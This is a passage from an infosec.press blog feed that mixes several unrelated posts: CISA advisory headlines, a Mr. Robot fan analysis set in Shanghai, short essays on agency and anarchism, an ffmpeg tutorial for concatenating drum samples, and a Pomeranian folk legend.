<em>vulnerability – CISA issued four advisories detailing vulnerabilities in Industrial Control Systems by Siemens, Tigo and EG5.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/08/19/cisa-releases-four-industrial-control-systems-advisories" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/08/19/cisa-releases-four-industrial-control-systems-advisories</a>
⚙️ CISA Releases Three Industrial Control Systems Advisories
<em>vulnerability – CISA issued three advisories detailing vulnerabilities in Mitsubishi Electric systems and FUJIFILM Healthcare&#39;s Synapse Mobility.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/08/21/cisa-releases-three-industrial-control-systems-advisories" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/08/21/cisa-releases-three-industrial-control-systems-advisories</a></p>

<hr>

<p>While my intention is to pick news that everyone should know about, it still is what I think is significant, cool, fun...
Most of the articles are in English, but some current warnings might be in German.</p>
]]></content:encoded>
      <author>📰wrzlbrmpft&#39;s cyberlights💥</author>
      <guid>https://infosec.press/read/a/y8kr5eyxh8</guid>
      <pubDate>Sun, 24 Aug 2025 21:43:47 +0000</pubDate>
    </item>
    <item>
      <title>Old Mr. Robot shit</title>
      <link>https://infosec.press/threatcat/old-mr</link>
      <description>&lt;![CDATA[This is something that I posted in r/MrRobot nearly a decade ago, in real-time after this particular episode dropped. I was living in Shanghai&#39;s French Concession, on the other side of the highway from Jing&#39;an Temple, which is near where I mention a bookstore below. I&#39;m putting it here because it was fun to write, and it still gives a little snapshot of the show and of China. I&#39;m also now only on Reddit when I&#39;m searching for a technical solution, or barring that, to share in similar unresolved misery, so I&#39;ve been meaning to archive a few things from there. Now that the show is currently on Netflix seems appropriate timing.&#xA;&#xA;The original post lives here&#xA;&#xA;[Spoilers S02E04] About that red dress Whiterose showed, plus movie and literary references&#xA;&#xA; A couple weeks ago I popped in to the boutique where Whiterose said she bought the red qipao that she showed to Dom. The place is called Jin Zhi Yu Ye, on Maoming Road in Shanghai, on a strip known for its qipaos. The designer is famous, and her shop is one of the top two places to get a qipao in the city. The English sign outsides says Leaves, but Whiterose called it by its Chinese name (though she says it with another final word/syllable that&#39;s not in the CC/subtitles)&#xA;&#xA;Disappointingly, the clerks didn&#39;t know of Whiterose, or BD Wong. I played the clip for them, though, and off the rack they showed me a similar red qipao but sleeveless, for 5,000RMB, or about US$750, then a black one that was really close but with longsleeves, going for just under 7,000RMB. These are all handmade, and if you&#39;re interested in these things and have pricy tastes, they mostly do custom jobs that can run up to 10,000RMB. As is normal here, they stopped me from taking any photos inside, so you&#39;re stuck with a potato-quality snap of the window display.&#xA;&#xA;Jin Zhi Yu Ye qipao shop, Shanghai&#xA;&#xA;But the shop name! It was little hint that Whiterose dropped, maybe intentionally, for Dom. Jin Zhi Yu Ye literally translates to Golden Branch, Jade Leaves. I asked a Chinese friend about any other meanings, and she said it&#39;s just words put together for a name, not an idiomatic phrase or poetic reference. She did say that it has a connotation of extravagance and royal lifestyle. More interesting, though, is that it&#39;s the Mandarin pronunciation of a hit 1990s romantic comedy from Hong Kong, 金枝玉葉. English title: &#34;He&#39;s a Woman, She&#39;s a Man.&#34; The movie was packed with stars. It&#39;s good, kinda over-the-top at times, but pretty standard for that time, place and genre. It was also applauded for bringing out discussion of LGBT life to a wider audience. The male lead, Leslie Cheung, had already starred in two gay-themed arthouse films that pulled awards at Cannes (&#34;Days of Being Wild&#34; by Wong Kar Wai and &#34;Farewell My Concubine,&#34; just the year before this one).&#xA;&#xA;The basic story of &#34;He&#39;s a Woman, She&#39;s a Man&#34; is of a female fan who idolizes a pop star singer and her male producer, played by Cheung. The musicians are rumored to be dating, and they are, but they&#39;re not that happy. In a fight, the singer challenges the producer to turn an amateur into a star. They hold contest auditions, and the fan, played by Anita Yuen, dresses up as a man to enter. She wins, and during the course of writing and recording with the producer, the two start falling for each other. Hilarity and questions of self ensue, yadda yadda. Notable makeout scene, though, where an IRL gay actor is playing a straight man who&#39;s conflicted about kissing a woman who&#39;s playing a man, and the scene is convincingly hot. Head asplode.&#xA;&#xA;[Edit note for 2025, and trigger warning self-harm: Leslie Cheung was IRL very close friends with another Anita, singer and actress Anita Mui. Their friendship naturally featured prominently in the 2021 biopic &#34;Anita,&#34; which I unexpectedly happened to catch on in-flight entertainment. It could&#39;ve been a decent movie, but that&#39;s entirely washed away by glaring omissions: the part that homophobia played in Leslie Cheung&#39;s clinical depression and suicide, as well as Anita Mui&#39;s activism, especially in remembrance of Tiananmen Square.] &#xA;&#xA;But back to the closet, there was another breadcrumb Whiterose dropped. She shows Dom two garments; before the qipao/cheongsam, she pulls out a long, sleeveless piece, telling Dom it&#39;s a magua, common in the Qing dynasty, which ended in 1911. She notes that the embroidery was meant for royal families. It kinda looks like a dress, and a normal magua would just be a common riding jacket, which were made for men and women. But the yellow magua (not just the color, but what it&#39;s called) was for high-ranking officials and bodyguards. Which means men. And then she showed the qipao/cheongsam.&#xA;&#xA;Besides this, the scene might have a little extra poignance in a literary reference. Shanghai was home to one of China&#39;s most important contemporary fiction writers, Eileen Chang. Her old apartment has a historical marker for her on it, and a fancy bookshop cafe on the ground floor sells $8 Americanos. When I visited for this post, they were out of the English version of one of her more notable novellas: &#34;Red Rose, White Rose&#34;. It&#39;s about a self-made man who likes control and order and has a storybook good life, well-rewarded for doing all the right things. He&#39;s married to a good woman, the White Rose, but there&#39;s another in his life, the wild and carefree Red Rose. No surprise, he&#39;s torn between the chaste and the passionate. The Cliff&#39;s Notes key quote:&#xA;&#xA;  Marry a red rose and eventually she&#39;ll be a mosquito-blood streak smeared on the wall, while the white one is “moonlight in front of my bed”. Marry a white rose, and before long she&#39;ll be a grain of sticky rice that&#39;s gotten stuck to your clothes; the red one, by then, is a scarlet beauty mark over your heart.&#xA;&#xA;Thinking of this put a new spin on the Beijing visit. Grace Gummer has said in interviews that she dyed her hair for the show. Red Rose? I did try to ask; I emailed the address from Dom&#39;s business card shown onscreen with the subject &#34;You&#39;re the Red Rose,&#34; but I never even got the autoreply.&#xA;&#xA;And then last on this, there&#39;s Eileen Chang herself. Of course, that&#39;s her Western name, but her name in Chinese is Zhang Ai-ling, maybe a namesake to Whiterose&#39;s public-facing identity as Minister Zhang.&#xA;&#xA;I&#39;ll be psyched if any of this is actually on the trail. (popping out of the original reddit post to say here now on infosec.press, wow, this is so amusing and embarrassing that I wrote this this way. But that was what it was like at the time. People got swept up big playing detective on shows that had these so-called alternate reality game elements. I remember consciously getting off Reddit shortly after because of all the bonkers theorizing.) I very much would like to see the China angles being rooted in or referencing real stuff. I know you&#39;d have to go with a fictional character for the story, but Zhang is the minister of state security, which is a real person here. Contrast that with Price talking to (then) Speaker of the House John Boehner and meeting in DC with Treasury Secretary Jack Lew, Federal Reserve Chair Janet Yellen and SEC Chair Mary Jo White. And that&#39;s all plausible. The &#39;real&#39; Zhang is Geng Huichang. Unless the future storyline has some cool twists, there&#39;s no way he&#39;s working with, let alone leading, a hacker group (also now popping back out to 2025 to again say, wow, time has moved on). And in the role as minister, I don&#39;t think that diplomatically, Zhang would meet with an FBI team; at that level of an official, among nations of more or less the same &#34;power,&#34; meetings are between counterparts, and subordinates handle the rest. But anyway, while the minister is a big role in an important institution, it&#39;s not the biggest; arguably, that&#39;s the party secretary. But that gets into China politics, which right now in intelligence is getting really shaken up, but overall it&#39;s probably too much inside baseball.&#xA;&#xA;Regardless, the show is dope, and being here I do get an extra kick out of the China parts. Just before posting this, I wanted to bounce some of this intelligence stuff in general off a Chinese friend, and found myself describing the show to her. And then:&#xA;&#xA;Me: &#34;You can find the whole first season on Youku.&#34;&#xA;&#xA;Her: &#34;Oh, so it&#39;s not banned?&#34;&#xA;&#xA;Me: (pause) &#34;Maybe the second season.&#34;&#xA;&#xA;TL;DR The shop where Whiterose bought the qipao she showed to Dom is also the title of a Hong Kong movie whose English title is &#34;He&#39;s a Woman, She&#39;s a Man&#34;. Also, there&#39;s a book called &#34;Red Rose, White Rose,&#34; written by Zhang Ai-ling. And Grace Gummer dyed her hair red for this show.&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<p><em>This is something that I posted in r/MrRobot nearly a decade ago, in real-time after this particular episode dropped. I was living in Shanghai&#39;s French Concession, on the other side of the highway from Jing&#39;an Temple, which is near where I mention a bookstore below. I&#39;m putting it here because it was fun to write, and it still gives a little snapshot of the show and of China. I&#39;m also now only on Reddit when I&#39;m searching for a technical solution, or barring that, to share in similar unresolved misery, so I&#39;ve been meaning to archive a few things from there. Now that the show is currently on Netflix seems appropriate timing.</em></p>

<p><em>The original post lives <a href="https://www.reddit.com/r/MrRobot/comments/51kvj9/spoilers_s02e04_about_that_red_dress_whiterose/" rel="nofollow">here</a></em></p>

<h4 id="spoilers-s02e04-about-that-red-dress-whiterose-showed-plus-movie-and-literary-references">[Spoilers S02E04] About that red dress Whiterose showed, plus movie and literary references</h4>

<p> A couple weeks ago I popped in to the boutique where Whiterose said she bought the red qipao that she showed to Dom. The place is called Jin Zhi Yu Ye, on Maoming Road in Shanghai, on a strip known for its qipaos. The designer is famous, and her shop is one of the top two places to get a qipao in the city. The English sign outsides says Leaves, but Whiterose called it by its Chinese name (though she says it with another final word/syllable that&#39;s not in the CC/subtitles)</p>

<p>Disappointingly, the clerks didn&#39;t know of Whiterose, or BD Wong. I played the clip for them, though, and off the rack they showed me a similar red qipao but sleeveless, for 5,000RMB, or about US$750, then a black one that was really close but with longsleeves, going for just under 7,000RMB. These are all handmade, and if you&#39;re interested in these things and have pricy tastes, they mostly do custom jobs that can run up to 10,000RMB. As is normal here, they stopped me from taking any photos inside, so you&#39;re stuck with a potato-quality snap of the window display.</p>

<p><img src="https://i.imgur.com/PfGpTnV.jpeg" alt="Jin Zhi Yu Ye qipao shop, Shanghai"></p>

<p>But the shop name! It was little hint that Whiterose dropped, maybe intentionally, for Dom. Jin Zhi Yu Ye literally translates to Golden Branch, Jade Leaves. I asked a Chinese friend about any other meanings, and she said it&#39;s just words put together for a name, not an idiomatic phrase or poetic reference. She did say that it has a connotation of extravagance and royal lifestyle. More interesting, though, is that it&#39;s the Mandarin pronunciation of a hit 1990s romantic comedy from Hong Kong, 金枝玉葉. English title: “He&#39;s a Woman, She&#39;s a Man.” The movie was packed with stars. It&#39;s good, kinda over-the-top at times, but pretty standard for that time, place and genre. It was also applauded for bringing out discussion of LGBT life to a wider audience. The male lead, Leslie Cheung, had already starred in two gay-themed arthouse films that pulled awards at Cannes (“Days of Being Wild” by Wong Kar Wai and “Farewell My Concubine,” just the year before this one).</p>

<p>The basic story of “He&#39;s a Woman, She&#39;s a Man” is of a female fan who idolizes a pop star singer and her male producer, played by Cheung. The musicians are rumored to be dating, and they are, but they&#39;re not that happy. In a fight, the singer challenges the producer to turn an amateur into a star. They hold contest auditions, and the fan, played by Anita Yuen, dresses up as a man to enter. She wins, and during the course of writing and recording with the producer, the two start falling for each other. Hilarity and questions of self ensue, yadda yadda. Notable makeout scene, though, where an IRL gay actor is playing a straight man who&#39;s conflicted about kissing a woman who&#39;s playing a man, and the scene is convincingly hot. Head asplode.</p>

<p><em>[Edit note for 2025, and trigger warning self-harm: Leslie Cheung was IRL very close friends with another Anita, singer and actress Anita Mui. Their friendship naturally featured prominently in the 2021 biopic “Anita,” which I unexpectedly happened to catch on in-flight entertainment. It could&#39;ve been a decent movie, but that&#39;s entirely washed away by glaring omissions: the part that homophobia played in Leslie Cheung&#39;s clinical depression and suicide, as well as Anita Mui&#39;s activism, especially in remembrance of Tiananmen Square.]</em></p>

<p>But back to the closet, there was another breadcrumb Whiterose dropped. She shows Dom two garments; before the qipao/cheongsam, she pulls out a long, sleeveless piece, telling Dom it&#39;s a magua, common in the Qing dynasty, which ended in 1911. She notes that the embroidery was meant for royal families. It kinda looks like a dress, and a normal magua would just be a common riding jacket, which were made for men and women. But the yellow magua (not just the color, but what it&#39;s called) was for high-ranking officials and bodyguards. Which means men. And then she showed the qipao/cheongsam.</p>

<p>Besides this, the scene might have a little extra poignance in a literary reference. Shanghai was home to one of China&#39;s most important contemporary fiction writers, Eileen Chang. Her old apartment has a historical marker for her on it, and a fancy bookshop cafe on the ground floor sells $8 Americanos. When I visited for this post, they were out of the English version of one of her more notable novellas: “Red Rose, White Rose”. It&#39;s about a self-made man who likes control and order and has a storybook good life, well-rewarded for doing all the right things. He&#39;s married to a good woman, the White Rose, but there&#39;s another in his life, the wild and carefree Red Rose. No surprise, he&#39;s torn between the chaste and the passionate. The Cliff&#39;s Notes key quote:</p>

<blockquote><p>Marry a red rose and eventually she&#39;ll be a mosquito-blood streak smeared on the wall, while the white one is “moonlight in front of my bed”. Marry a white rose, and before long she&#39;ll be a grain of sticky rice that&#39;s gotten stuck to your clothes; the red one, by then, is a scarlet beauty mark over your heart.</p></blockquote>

<p>Thinking of this put a new spin on the Beijing visit. Grace Gummer has said in interviews that she dyed her hair for the show. Red Rose? I did try to ask; I emailed the address from Dom&#39;s business card shown onscreen with the subject “You&#39;re the Red Rose,” but I never even got the autoreply.</p>

<p>And then last on this, there&#39;s Eileen Chang herself. Of course, that&#39;s her Western name, but her name in Chinese is Zhang Ai-ling, maybe a namesake to Whiterose&#39;s public-facing identity as Minister Zhang.</p>

<p>I&#39;ll be psyched if any of this is actually on the trail. <em>(popping out of the original reddit post to say here now on infosec.press, wow, this is so amusing and embarrassing that I wrote this this way. But that was what it was like at the time. People got swept up big playing detective on shows that had these so-called alternate reality game elements. I remember consciously getting off Reddit shortly after because of all the bonkers theorizing.)</em> I very much would like to see the China angles being rooted in or referencing real stuff. I know you&#39;d have to go with a fictional character for the story, but Zhang is the minister of state security, which is a real person here. Contrast that with Price talking to (then) Speaker of the House John Boehner and meeting in DC with Treasury Secretary Jack Lew, Federal Reserve Chair Janet Yellen and SEC Chair Mary Jo White. And that&#39;s all plausible. The &#39;real&#39; Zhang is Geng Huichang. Unless the future storyline has some cool twists, there&#39;s no way he&#39;s working with, let alone leading, a hacker group <em>(also now popping back out to 2025 to again say, wow, time has moved on)</em>. And in the role as minister, I don&#39;t think that diplomatically, Zhang would meet with an FBI team; at that level of an official, among nations of more or less the same “power,” meetings are between counterparts, and subordinates handle the rest. But anyway, while the minister is a big role in an important institution, it&#39;s not the biggest; arguably, that&#39;s the party secretary. But that gets into China politics, which right now in intelligence is getting really shaken up, but overall it&#39;s probably too much inside baseball.</p>

<p>Regardless, the show is dope, and being here I do get an extra kick out of the China parts. Just before posting this, I wanted to bounce some of this intelligence stuff in general off a Chinese friend, and found myself describing the show to her. And then:</p>

<p>Me: “You can find the whole first season on Youku.”</p>

<p>Her: “Oh, so it&#39;s not banned?”</p>

<p>Me: (pause) “Maybe the second season.”</p>

<p>TL;DR The shop where Whiterose bought the qipao she showed to Dom is also the title of a Hong Kong movie whose English title is “He&#39;s a Woman, She&#39;s a Man”. Also, there&#39;s a book called “Red Rose, White Rose,” written by Zhang Ai-ling. And Grace Gummer dyed her hair red for this show.</p>
]]></content:encoded>
      <author>Threatc.at</author>
      <guid>https://infosec.press/read/a/k07f11sin8</guid>
      <pubDate>Thu, 21 Aug 2025 14:22:41 +0000</pubDate>
    </item>
    <item>
      <title>People Should Stop Demanding Prophecy from Others</title>
      <link>https://infosec.press/rvyhvn/people-should-stop-demanding-prophecy-from-others</link>
      <description>&lt;![CDATA[There’s a pattern I keep seeing, especially online where someone steps up to do something different, tries to shift the culture or challenge the norm, and instead of support, they get bombarded with demands. &#34;Why don’t you do more?&#34; &#34;You should fix X too&#34; As if trying to change anything means you’re now responsible for everything. As if one person is supposed to carry the entire system on their back. This reflects a deeper problem: people constantly externalize responsibility. They expect change to come from someone else—some leader, some influencer, some movement, some system. Rarely from themselves.&#xA;&#xA;It’s the same mindset that keeps people trapped in cycles of dependency on authority—whether it&#39;s politicians, celebrities, or &#34;visionaries.&#34; They wait. They comment. They criticize. But they rarely start. The agent of change is expected to be prophetic, to know all, fix all, and be everything for everyone meanwhile the crowd stays seated, watching. This is why systems of power persist. Not because they’re strong, but because most people won’t act unless someone gives them permission. That’s why even with all the information and tools we have, so many still cling to illusions of saviors—presidents, parties, parliaments—as if those constructs ever had people’s true interests at heart. This isn’t a call to be apolitical. It’s a call to stop waiting for permission. Stop demanding prophecy. Start becoming the kind of person who acts, even without recognition, even when it’s imperfect. Especially when it&#39;s imperfect.&#xA;&#xA;Criticism is easy. Creation is hard. Most people never cross that line. You want a better world? Start with yourself. Build with those around you. No one&#39;s coming to save you. There’s no prophecy. There’s just action.&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<p>There’s a pattern I keep seeing, especially online where someone steps up to do something different, tries to shift the culture or challenge the norm, and instead of support, they get bombarded with demands. <em>“Why don’t you do more?”</em> <em>“You should fix X too”</em> As if trying to change anything means you’re now responsible for everything. As if one person is supposed to carry the entire system on their back. This reflects a deeper problem: people constantly externalize responsibility. They expect change to come from <em>someone else</em>—some leader, some influencer, some movement, some system. Rarely from themselves.</p>

<p>It’s the same mindset that keeps people trapped in cycles of dependency on authority—whether it&#39;s politicians, celebrities, or “visionaries.” They wait. They comment. They criticize. But they rarely start. The agent of change is expected to be prophetic, to know all, fix all, and be everything for everyone meanwhile the crowd stays seated, watching. This is why systems of power persist. Not because they’re strong, but because most people won’t act unless someone gives them permission. That’s why even with all the information and tools we have, so many still cling to illusions of saviors—presidents, parties, parliaments—as if those constructs ever had people’s true interests at heart. This isn’t a call to be apolitical. It’s a call to stop waiting for permission. Stop demanding prophecy. Start becoming the kind of person who acts, even without recognition, even when it’s imperfect. Especially when it&#39;s imperfect.</p>

<p>Criticism is easy. Creation is hard. Most people never cross that line. You want a better world? Start with yourself. Build with those around you. No one&#39;s coming to save you. There’s no prophecy. There’s just action.</p>
]]></content:encoded>
      <author>rvyhvn</author>
      <guid>https://infosec.press/read/a/3eq2ubz650</guid>
      <pubDate>Sun, 27 Jul 2025 15:14:40 +0000</pubDate>
    </item>
    <item>
      <title>concatenating wav files... </title>
      <link>https://infosec.press/000/concatenating-wav-files</link>
      <description>&lt;![CDATA[using ffmpeg&#xA;&#xA;good for making drum kits for the m8 - you can do this in a directory with a lot of tiny samples.&#xA;&#xA;1. prepare the directory&#xA;put all the samples you want to concatenate into the same directory and then navigate to that location in the terminal.&#xA;&#xA;2. add silence&#xA;this will create copies of the files which have a tiny amount of silence appended to them. this helps with the m8s auto-slice function (though you&#39;ll still usually want to tweak the results). This command will do it:&#xA;&#xA;for i in .wav; do ffmpeg -i &#34;$i&#34; -af &#34;adelay=100|100&#34; &#34;${i%.}-EDIT.wav&#34;; done&#xA;&#xA;3. remove the original files.&#xA;the newly created files will have &#34;-EDIT&#34; added to their names just before the .wav file extension. only keep those ones in the directory. (you can just move the other ones out of the folder, or delete them if you made copies to begin with).&#xA;&#xA;4. generate input text file &#xA;from the files which are now in the folder&#xA;&#xA;for f in .wav; do echo &#34;file &#39;$f&#39;&#34;     mylist.txt; done&#xA;&#xA;bonus: you can change the order of the sounds by editing this text file before executing the next step.*&#xA;&#xA;5. concatenate all the wav files&#xA;&#xA;ffmpeg -f concat -safe 0 -i mylist.txt -c copy concat.wav&#xA;&#xA;6. rename the resultant &#34;concat.wav&#34; file&#xA;... to whatever describes the collection you&#39;ve created. (I like to prefix these files with &#34;cct&#34; ie. &#34;cct-Yamaha-MR10.wav&#34;)&#xA;&#xA;7. load it up&#xA;fine tune the slices, &amp; fuck around with it.]]&gt;</description>
      <content:encoded><![CDATA[<p>using <a href="https://ffmpeg.org/download.html" rel="nofollow">ffmpeg</a></p>

<p><em>good for <a href="https://trac.ffmpeg.org/wiki/Concatenate" rel="nofollow">making drum kits</a> for the <a href="https://dirtywave.com/" rel="nofollow">m8</a> – you can do this in a directory with a lot of tiny samples.</em></p>

<h3 id="1-prepare-the-directory">1. prepare the directory</h3>

<p>put all the samples you want to concatenate into the same directory and then navigate to that location in the terminal.</p>

<h3 id="2-add-silence">2. add silence</h3>

<p>this will create copies of the files which have a tiny amount of silence appended to them. this helps with the m8s auto-slice function (though you&#39;ll still usually want to tweak the results). This command will do it:</p>

<pre><code>for i in *.wav; do ffmpeg -i &#34;$i&#34; -af &#34;adelay=100|100&#34; &#34;${i%.*}-EDIT.wav&#34;; done
</code></pre>

<h3 id="3-remove-the-original-files">3. remove the original files.</h3>

<p>the newly created files will have “-EDIT” added to their names just before the .wav file extension. only keep those ones in the directory. <em>(you can just move the other ones out of the folder, or delete them if you made copies to begin with).</em></p>

<h3 id="4-generate-input-text-file">4. generate input text file</h3>

<p>from the files which are now in the folder</p>

<pre><code>for f in *.wav; do echo &#34;file &#39;$f&#39;&#34; &gt;&gt; mylist.txt; done
</code></pre>
<ul><li><em>bonus: you can change the order of the sounds by editing this text file before executing the next step.</em></li></ul>

<h3 id="5-concatenate-all-the-wav-files">5. concatenate all the wav files</h3>

<pre><code>ffmpeg -f concat -safe 0 -i mylist.txt -c copy concat.wav
</code></pre>

<h3 id="6-rename-the-resultant-concat-wav-file">6. rename the resultant “concat.wav” file</h3>

<p>... to whatever describes the collection you&#39;ve created. (I like to prefix these files with “cct” ie. “cct-Yamaha-MR10.wav”)</p>

<h3 id="7-load-it-up">7. load it up</h3>

<p>fine tune the slices, &amp; fuck around with it.</p>
]]></content:encoded>
      <author>000</author>
      <guid>https://infosec.press/read/a/ezjf5duq2c</guid>
      <pubDate>Sat, 19 Jul 2025 05:31:57 +0000</pubDate>
    </item>
    <item>
      <title>I&#39;m an Anarchist but I Don&#39;t Want It to Be Applied (At Least For Now)</title>
      <link>https://infosec.press/rvyhvn/im-an-anarchist-but-i-dont-want-it-to-be-applied-at-least-for-now</link>
      <description>&lt;![CDATA[Being an anarchist is often misunderstood. Many people think it&#39;s about breaking all rules and creating chaos. Additionally in my country, even mainstream media are mistakenly saying vandalism is equal to anarchism. This make me shake my head as they don&#39;t understand what anarchism really is. I&#39;ve been practically doing anarchism value in my immediate social circles. I contribute to education, I reject about structural group in college especially for making decisions and I educate people about abstaining from political participation because no politicians can truly be trusted. I often share my thoughts on social issues from an anarchist point of view. Like most anarchists, I believe in building a society aligned with anarchist values. But still, I don&#39;t want anarchism to be applied in our society yet, in any state. Why?&#xA;&#xA;Too Extreme for People to Accept&#xA;&#xA;Anarchism is seen as &#34;too far left&#34; ideology, unlike socialism or communism, we reject hierarchical rulers. Everyone should be treated equally and all opinions should matter (as long as they&#39;re logically sound). But most countries today are run by conservatives who uphold capitalism, which is the complete opposite anarchism. These governments are elected by the conservative citizens, so the system and the people share the same ideology. Which makes it harder to spread anarchist values. By definition, conservatism is a commitment to traditional values and ideas with opposition to change or innovation. Capitalism has been dominant for over a century. That&#39;s why people fear radical change. Which leads to the next point.&#xA;&#xA;Historical Failures of Leftist Ideas&#xA;&#xA;The Soviet Union was once the biggest leftist state in the world and it collapsed. Many people now see that as proof that leftist ideologies don’t work. They say systems like socialism or anarchism are too utopian to survive in the real world. Because of that fear, anarchism is seen as unrealistic, even dangerous.&#xA;&#xA;Anarchism Is Misunderstood&#xA;&#xA;This ties into ignorance and media literacy. Many people think anarchism means “no rules” e.g. total chaos, violence, people killing each other. That’s NOT what anarchism is. As I mentioned earlier, the media here even label May Day protests as “anarchic” just because of vandalism or people spray-painting walls. That’s not anarchism, that’s just destruction. These false narratives shape public misunderstanding.&#xA;&#xA;Bad People Still Exist&#xA;&#xA;This is the main reason I don&#39;t think anarchism can work right now. There are still people who will take advantage of others if laws don’t exist. Legal systems, even if flawed, can still restrain some bad behavior. But in a world without written laws? Those people would feel free to exploit, harm, or abuse others. It’s like saying morals come from religion. If religion disappears, would some people suddenly start robbing, raping, or killing? That’s the scary part.&#xA;&#xA;People today still need to learn how to be decent human beings and open themselves to new perspectives. Only then can we start introducing anarchist values in a real, meaningful way.&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<p>Being an anarchist is often misunderstood. Many people think it&#39;s about breaking all rules and creating chaos. Additionally in my country, even mainstream media are mistakenly saying vandalism is equal to anarchism. This make me shake my head as they don&#39;t understand what anarchism really is. I&#39;ve been practically doing anarchism value in my immediate social circles. I contribute to education, I reject about structural group in college especially for making decisions and I educate people about abstaining from political participation because no politicians can truly be trusted. I often share my thoughts on social issues from an anarchist point of view. Like most anarchists, I believe in building a society aligned with anarchist values. But still, I don&#39;t want anarchism to be applied in our society yet, in any state. Why?</p>

<h2 id="too-extreme-for-people-to-accept">Too Extreme for People to Accept</h2>

<p>Anarchism is seen as “too far left” ideology, unlike socialism or communism, we reject hierarchical rulers. Everyone should be treated equally and all opinions should matter (as long as they&#39;re logically sound). But most countries today are run by conservatives who uphold capitalism, which is the complete opposite anarchism. These governments are elected by the conservative citizens, so the system and the people share the same ideology. Which makes it harder to spread anarchist values. By definition, conservatism is a commitment to traditional values and ideas with opposition to change or innovation. Capitalism has been dominant for over a century. That&#39;s why people fear radical change. Which leads to the next point.</p>

<h2 id="historical-failures-of-leftist-ideas">Historical Failures of Leftist Ideas</h2>

<p>The Soviet Union was once the biggest leftist state in the world and it collapsed. Many people now see that as proof that leftist ideologies don’t work. They say systems like socialism or anarchism are too utopian to survive in the real world. Because of that fear, anarchism is seen as unrealistic, even dangerous.</p>

<h2 id="anarchism-is-misunderstood">Anarchism Is Misunderstood</h2>

<p>This ties into ignorance and media literacy. Many people think anarchism means “no rules” e.g. total chaos, violence, people killing each other. That’s NOT what anarchism is. As I mentioned earlier, the media here even label May Day protests as “anarchic” just because of vandalism or people spray-painting walls. That’s not anarchism, that’s just destruction. These false narratives shape public misunderstanding.</p>

<h2 id="bad-people-still-exist">Bad People Still Exist</h2>

<p>This is the main reason I don&#39;t think anarchism can work right now. There are still people who will take advantage of others if laws don’t exist. Legal systems, even if flawed, can still restrain some bad behavior. But in a world without written laws? Those people would feel free to exploit, harm, or abuse others. It’s like saying morals come from religion. If religion disappears, would some people suddenly start robbing, raping, or killing? That’s the scary part.</p>

<p>People today still need to learn how to be decent human beings and open themselves to new perspectives. Only then can we start introducing anarchist values in a real, meaningful way.</p>
]]></content:encoded>
      <author>rvyhvn</author>
      <guid>https://infosec.press/read/a/6sfljit5f2</guid>
      <pubDate>Thu, 03 Jul 2025 15:49:07 +0000</pubDate>
    </item>
    <item>
      <title>The Corpse Lake</title>
      <link>https://infosec.press/copies/the-corpse-lake</link>
      <description>&lt;![CDATA[via Jürgen Hubert - @juergenhubert@mementomori.social&#xA;&#xA;Not far from the village of Retzin, which lies about one and a half miles away from Penkun, there is a long, tall hill and beneath it lies a lake commonly known as the Leichensee (&#34;corpse lake&#34;). On the hill, which is now overgrown with shrubs, there used to be a bandits&#39; castle, whose remains can be spotted now and then amidst the shrubbery. The whole hill is therefore still called the Burgwall (&#34;castle wall&#34;)[1]. The bandits who lived in the castle threw the corpses of those they slew into the lake, from which the lake derives its name. The murdered and the murderers are said to haunt the lake and its environs in some nights, and nobody likes to visit the area after dark.&#xA;Another tale gives us more details: The Leichensee is in the middle of two spots where two castles used to stand, and where now the villages of Lökenitz and Ramin can be found. These two castles belonged to a villainous robber knight named Hans von Ramin. The river Randow, which flows through the lake, was traversable by ships in those days[2] and thus it was common for ships to pass through the lake. The knight with his bandits only waited for those moments, and he had constructed an ingenious contraption which aided him in capturing those ships. He had put down two chains across the lake which were about 50 feet apart, and which were about two inches above the water when they were stretched taut.&#xA;Whenever he saw a ship approaching in the distance he and his bandits hid in the reeds at the shore of the lake and left the first chain slacken so that it would be below the surface of the water.&#xA;But when the ship had passed over it, he pulled it taut again. And thus the ship was stuck between the two chains and could go neither backwards nor forwards, and he and his bandits swarmed over it, slaughtered the crew, and took all of its goods. The corpses were thrown into the lake, on the side of the long hill[3].&#xA;It frequently occurred that the bandits discovered a larger crew on the ship than they had anticipated. In these cases they rang a large bell, which they had hung up at the shore for this very purpose. Then reinforcements would arrive from both castles. This bell fell into the lake after the death of the knight. It remains there, and at noon on St. John&#39;s Day it is still possible to hear its ringing.&#xA;Source: Temme, J. D. H. Die Volkssagen von Pommern und Rügen, 1840. P. 202-204.]]&gt;</description>
      <content:encoded><![CDATA[<p>via <a href="https://mementomori.social/@juergen_hubert/114789916014631660" rel="nofollow">Jürgen Hubert</a> – @juergen_hubert@mementomori.social</p>

<p>Not far from the village of Retzin, which lies about one and a half miles away from Penkun, there is a long, tall hill and beneath it lies a lake commonly known as the Leichensee (“corpse lake”). On the hill, which is now overgrown with shrubs, there used to be a bandits&#39; castle, whose remains can be spotted now and then amidst the shrubbery. The whole hill is therefore still called the Burgwall (“castle wall”)[1]. The bandits who lived in the castle threw the corpses of those they slew into the lake, from which the lake derives its name. The murdered and the murderers are said to haunt the lake and its environs in some nights, and nobody likes to visit the area after dark.
Another tale gives us more details: The Leichensee is in the middle of two spots where two castles used to stand, and where now the villages of Lökenitz and Ramin can be found. These two castles belonged to a villainous robber knight named Hans von Ramin. The river Randow, which flows through the lake, was traversable by ships in those days[2] and thus it was common for ships to pass through the lake. The knight with his bandits only waited for those moments, and he had constructed an ingenious contraption which aided him in capturing those ships. He had put down two chains across the lake which were about 50 feet apart, and which were about two inches above the water when they were stretched taut.
Whenever he saw a ship approaching in the distance he and his bandits hid in the reeds at the shore of the lake and left the first chain slacken so that it would be below the surface of the water.
But when the ship had passed over it, he pulled it taut again. And thus the ship was stuck between the two chains and could go neither backwards nor forwards, and he and his bandits swarmed over it, slaughtered the crew, and took all of its goods. The corpses were thrown into the lake, on the side of the long hill[3].
It frequently occurred that the bandits discovered a larger crew on the ship than they had anticipated. In these cases they rang a large bell, which they had hung up at the shore for this very purpose. Then reinforcements would arrive from both castles. This bell fell into the lake after the death of the knight. It remains there, and at noon on St. John&#39;s Day it is still possible to hear its ringing.
Source: Temme, J. D. H. Die Volkssagen von Pommern und Rügen, 1840. P. 202-204.</p>
]]></content:encoded>
      <author>copies</author>
      <guid>https://infosec.press/read/a/x7drb8b6be</guid>
